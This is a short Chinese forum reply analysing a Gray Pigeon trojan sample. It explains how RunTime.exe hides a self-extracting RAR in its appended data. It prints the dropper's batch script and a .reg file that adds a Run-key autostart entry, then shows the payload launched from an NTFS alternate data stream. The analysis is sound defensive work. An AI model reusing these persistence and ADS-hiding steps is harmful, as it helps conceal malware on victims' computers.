回复: 特别的鸽子(转自卡饭)
实际上RunTime.exe本身的可执行文件部分根本不是鸽子,正如我上面所说。
鸽子来自于它的附加数据部分。附加数据从文件偏移0x2F4000开始,为一个带有自解压命令的RAR文件。
将此RAR文件拿出来,用WINRAR打开,如图:
附件:
您所在的用户组无法下载或查看附件由自解压脚本,自解压时运行的是1.bat,1.bat内容:
cd %ProgramFiles%\Common Files\InstallShield\Professional\RunTime\
regedit /s 1.orz
start .\1.txt:5.exe
使用regedit导入1.orz。1.orz是一个UNICODE字符集的.reg文件,内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Cleaner"="\"C:\\Program Files\\Common Files\\InstallShield\\Professional\\RunTime\\1.bat\""
即写入启动项。
然后运行1.txt附带的ADS流文件5.exe,这个5.exe才是鸽子。
而且这种方法的前提是,系统盘应为NTFS格式。